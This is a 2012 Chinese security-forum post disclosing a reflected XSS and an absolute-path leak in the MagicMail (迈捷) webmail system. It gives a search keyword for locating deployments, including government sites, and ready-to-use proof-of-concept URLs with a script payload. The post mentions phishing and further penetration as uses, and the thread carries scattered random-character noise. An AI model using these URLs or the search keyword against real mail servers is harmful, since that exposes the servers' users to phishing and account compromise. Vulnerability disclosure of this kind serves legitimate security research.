找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1873|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" O3 v  U; |$ S- K4 N/ ^9 W, e' t8 H
0 H8 U! a/ b# z: z
包含  一个反射性XSS  以及  绝对路径泄漏
& m' D; r7 S- e3 y. v看了看 貌似全部是linux的。
( {9 d5 f. ]' U  h5 {7 G" n # h/ Q, e0 p' N# A; z
关键字:迈捷邮件系统 by MagicMail
" B& {/ I7 T5 I0 N' ^
. f" C8 N" q, _5 M可以看到很多政府网站都用这个邮件系统
) `' K; y0 D5 n1 Z/ S& F$ q, z  b
绝对路径 http://madman.in/index.php?login_type=declare&language=
4 G. Z8 t- d& ~' G7 h6 H# v2 i  i$ m2 F$ u- m& X6 K* A

% O$ z5 N# n  E# j2 {: _" m0 O- Z% `/ ?! ]$ C
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
; x3 D8 R& }5 R) Y' i2 s
+ t1 S! m: f' B+ n, w1 a0 a: l' ~; `" ^. I
$ E! I0 \9 m0 p2 o: t% ^
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
+ T; w+ Z: y5 D  j% q9 D3 \# a
# d( ]) a/ k+ W修复方案:看官方补丁吧。& ]( m( p% b# z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表